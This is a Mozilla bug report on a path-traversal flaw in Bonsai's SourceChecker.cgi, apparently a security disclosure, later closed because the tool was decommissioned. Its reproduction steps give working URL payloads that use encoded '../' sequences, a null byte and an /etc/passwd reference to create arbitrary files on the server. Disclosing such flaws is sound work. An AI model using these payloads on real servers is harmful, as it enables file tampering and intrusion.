655856 - bonsai sourcechecker.cgi arbitrary file creation

Status: RESOLVED WONTFIX

(Webtools Graveyard :: Bonsai, defect)

Description

[David Chan [:dchan]]

Input passed to SourceChecker.cgi is not properly sanitized which allows attackers to create arbitrary files on the server. I'm not sure what the behavior is if an existing file is passed to dbmopen

STR
1. Visit
http://bonsai-www.mozilla.org/cvslog.cgi?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2ftmp%2f<FILENAME>%00
Replace <FILENAME> with the desired name
2. You should get an error
"tmp/<FILENAME>, does not exist."
3. Visit
http://bonsai-www.mozilla.org/SourceChecker.cgi?dictionary=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2ftmp%2f<FILENAME>&ignore_english=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
4. Revist the link in step 1
5. You should get a different error
"Unexpected EOF at cvsblame.pl line 133."

It may be possible to insert arbitrary data into the dictionary file using data from the ignore_english file. ignore_strings, flag_strings and ignore_names are other params that can be used as sources


Recommended remediation
Sanitize paths provided to the application.

Comment 1

[Michael Coates [:mcoates] (acct no longer active)]

Laura,

Can we get this into someone's queue to address the issue?

Comment 2

[Greg Cox [:gcox]]

bonsai was decom'ed in bug 1157907

Comment 3

[Adam Muntner [:adamm] (use NEEDINFO)]

There are a bunch of open Bonsai bugs, advisory + close all wontfix is prob the best solution

https://bugzilla.mozilla.org/buglist.cgi?component=Bonsai&product=Webtools&bug_status=__open__&list_id=13018520

If it's not Cloud Services let me know and I'll chase down who the right people would be.

Comment 4

[Adam Muntner [:adamm] (use NEEDINFO)]

Bonsai was decommissioned, closing all remaining bugs "wontfix"